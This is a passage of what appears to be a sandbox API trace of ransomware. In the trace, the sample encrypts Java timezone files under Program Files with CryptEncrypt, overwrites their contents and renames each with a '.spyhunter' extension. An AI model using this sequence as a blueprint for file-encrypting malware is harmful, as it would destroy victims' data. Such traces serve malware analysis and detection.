pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka.spyhunter") returned 64 [0169.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka.spyhunter")) returned 1 [0169.574] GetProcessHeap () returned 0x2c0000 [0169.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.574] GetProcessHeap () returned 0x2c0000 [0169.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.574] GetProcessHeap () returned 0x2c0000 [0169.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26e68 | out: hHeap=0x2c0000) returned 1 [0169.574] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4e0 | out: pbBuffer=0x25ce4e0) returned 1 [0169.574] GetProcessHeap () returned 0x2c0000 [0169.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.574] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4d8*=0x30) returned 1 [0169.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.575] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus") returned 57 [0169.575] StrStrW (lpFirst="Damascus", lpSrch=".txt") returned 0x0 [0169.575] GetProcessHeap () returned 0x2c0000 [0169.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.575] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce49c*=0x514, lpOverlapped=0x0) returned 1 [0169.578] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffaec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.578] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x514, lpNumberOfBytesWritten=0x25ce49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce49c*=0x514, lpOverlapped=0x0) returned 1 [0169.578] GetProcessHeap () returned 0x2c0000 [0169.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.579] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.579] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce49c, lpOverlapped=0x0 | out: lpBuffer=0x25ce4dc*, lpNumberOfBytesWritten=0x25ce49c*=0x4, lpOverlapped=0x0) returned 1 [0169.579] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce49c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce49c*=0x30, lpOverlapped=0x0) returned 1 [0169.579] CloseHandle (hObject=0xa0) returned 1 [0169.579] GetProcessHeap () returned 0x2c0000 [0169.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.579] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus.spyhunter") returned 67 [0169.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus.spyhunter")) returned 1 [0169.580] GetProcessHeap () returned 0x2c0000 [0169.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.580] GetProcessHeap () returned 0x2c0000 [0169.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.580] GetProcessHeap () returned 0x2c0000 [0169.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9f40 | out: hHeap=0x2c0000) returned 1 [0169.580] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4e0 | out: pbBuffer=0x25ce4e0) returned 1 [0169.580] GetProcessHeap () returned 0x2c0000 [0169.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.581] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4d8*=0x30) returned 1 [0169.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.581] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo") returned 56 [0169.581] StrStrW (lpFirst="Colombo", lpSrch=".txt") returned 0x0 [0169.581] GetProcessHeap () returned 0x2c0000 [0169.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.581] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce49c*=0x81, lpOverlapped=0x0) returned 1 [0169.582] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.582] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x25ce49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce49c*=0x81, lpOverlapped=0x0) returned 1 [0169.582] GetProcessHeap () returned 0x2c0000 [0169.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.582] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.582] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce49c, lpOverlapped=0x0 | out: lpBuffer=0x25ce4dc*, lpNumberOfBytesWritten=0x25ce49c*=0x4, lpOverlapped=0x0) returned 1 [0169.582] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce49c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce49c*=0x30, lpOverlapped=0x0) returned 1 [0169.583] CloseHandle (hObject=0xa0) returned 1 [0169.583] GetProcessHeap () returned 0x2c0000 [0169.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.583] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo.spyhunter") returned 66 [0169.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo.spyhunter")) returned 1 [0169.583] GetProcessHeap () returned 0x2c0000 [0169.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.583] GetProcessHeap () returned 0x2c0000 [0169.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.584] GetProcessHeap () returned 0x2c0000 [0169.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9e80 | out: hHeap=0x2c0000) returned 1 [0169.584] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4d8 | out: pbBuffer=0x25ce4d8) returned 1 [0169.584] GetProcessHeap () returned 0x2c0000 [0169.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.584] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4d0*=0x30) returned 1 [0169.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.631] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing") returned 58 [0169.631] StrStrW (lpFirst="Chongqing", lpSrch=".txt") returned 0x0 [0169.631] GetProcessHeap () returned 0x2c0000 [0169.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.632] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce494*=0xb5, lpOverlapped=0x0) returned 1 [0169.632] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.632] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb5, lpNumberOfBytesWritten=0x25ce494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce494*=0xb5, lpOverlapped=0x0) returned 1 [0169.632] GetProcessHeap () returned 0x2c0000 [0169.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.633] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.633] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce494, lpOverlapped=0x0 | out: lpBuffer=0x25ce4d4*, lpNumberOfBytesWritten=0x25ce494*=0x4, lpOverlapped=0x0) returned 1 [0169.633] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce494, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce494*=0x30, lpOverlapped=0x0) returned 1 [0169.633] CloseHandle (hObject=0x178) returned 1 [0169.633] GetProcessHeap () returned 0x2c0000 [0169.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.633] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing.spyhunter") returned 68 [0169.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing.spyhunter")) returned 1 [0169.634] GetProcessHeap () returned 0x2c0000 [0169.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.634] GetProcessHeap () returned 0x2c0000 [0169.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.634] GetProcessHeap () returned 0x2c0000 [0169.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9dc0 | out: hHeap=0x2c0000) returned 1 [0169.634] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4d8 | out: pbBuffer=0x25ce4d8) returned 1 [0169.634] GetProcessHeap () returned 0x2c0000 [0169.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.634] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4d0*=0x30) returned 1 [0169.634] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.635] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok") returned 56 [0169.635] StrStrW (lpFirst="Bangkok", lpSrch=".txt") returned 0x0 [0169.635] GetProcessHeap () returned 0x2c0000 [0169.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.635] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce494*=0x41, lpOverlapped=0x0) returned 1 [0169.635] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.635] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25ce494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce494*=0x41, lpOverlapped=0x0) returned 1 [0169.636] GetProcessHeap () returned 0x2c0000 [0169.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.636] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.636] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce494, lpOverlapped=0x0 | out: lpBuffer=0x25ce4d4*, lpNumberOfBytesWritten=0x25ce494*=0x4, lpOverlapped=0x0) returned 1 [0169.636] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce494, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce494*=0x30, lpOverlapped=0x0) returned 1 [0169.636] CloseHandle (hObject=0x178) returned 1 [0169.636] GetProcessHeap () returned 0x2c0000 [0169.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.636] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok.spyhunter") returned 66 [0169.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok.spyhunter")) returned 1 [0169.637] GetProcessHeap () returned 0x2c0000 [0169.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.637] GetProcessHeap () returned 0x2c0000 [0169.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.637] GetProcessHeap () returned 0x2c0000 [0169.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9340 | out: hHeap=0x2c0000) returned 1 [0169.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4d0 | out: pbBuffer=0x25ce4d0) returned 1 [0169.637] GetProcessHeap () returned 0x2c0000 [0169.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.637] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4c8*=0x30) returned 1 [0169.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.704] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku") returned 53 [0169.704] StrStrW (lpFirst="Baku", lpSrch=".txt") returned 0x0 [0169.704] GetProcessHeap () returned 0x2c0000 [0169.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.704] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce48c*=0x3d0, lpOverlapped=0x0) returned 1 [0169.750] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.750] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce48c*=0x3d0, lpOverlapped=0x0) returned 1 [0169.750] GetProcessHeap () returned 0x2c0000 [0169.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.750] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.750] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x25ce4cc*, lpNumberOfBytesWritten=0x25ce48c*=0x4, lpOverlapped=0x0) returned 1 [0169.750] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce48c*=0x30, lpOverlapped=0x0) returned 1 [0169.750] CloseHandle (hObject=0x178) returned 1 [0169.750] GetProcessHeap () returned 0x2c0000 [0169.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.750] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku.spyhunter") returned 63 [0169.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku.spyhunter")) returned 1 [0169.751] GetProcessHeap () returned 0x2c0000 [0169.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.751] GetProcessHeap () returned 0x2c0000 [0169.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.751] GetProcessHeap () returned 0x2c0000 [0169.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26c40 | out: hHeap=0x2c0000) returned 1 [0169.752] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4d0 | out: pbBuffer=0x25ce4d0) returned 1 [0169.752] GetProcessHeap () returned 0x2c0000 [0169.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.752] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4c8*=0x30) returned 1 [0169.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.787] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey") returned 60 [0169.787] StrStrW (lpFirst="Casey", lpSrch=".txt") returned 0x0 [0169.787] GetProcessHeap () returned 0x2c0000 [0169.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.787] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce48c*=0x65, lpOverlapped=0x0) returned 1 [0169.787] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff9b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.788] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce48c*=0x65, lpOverlapped=0x0) returned 1 [0169.788] GetProcessHeap () returned 0x2c0000 [0169.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.788] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.788] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x25ce4cc*, lpNumberOfBytesWritten=0x25ce48c*=0x4, lpOverlapped=0x0) returned 1 [0169.788] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce48c*=0x30, lpOverlapped=0x0) returned 1 [0169.788] CloseHandle (hObject=0x178) returned 1 [0169.788] GetProcessHeap () returned 0x2c0000 [0169.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.788] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey.spyhunter") returned 70 [0169.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey.spyhunter")) returned 1 [0169.789] GetProcessHeap () returned 0x2c0000 [0169.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.789] GetProcessHeap () returned 0x2c0000 [0169.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.789] GetProcessHeap () returned 0x2c0000 [0169.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba8e0 | out: hHeap=0x2c0000) returned 1 [0169.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4c8 | out: pbBuffer=0x25ce4c8) returned 1 [0169.789] GetProcessHeap () returned 0x2c0000 [0169.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4c0*=0x30) returned 1 [0169.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.790] lstrlenW (lpString="\\\\?\\C:\\Program Files 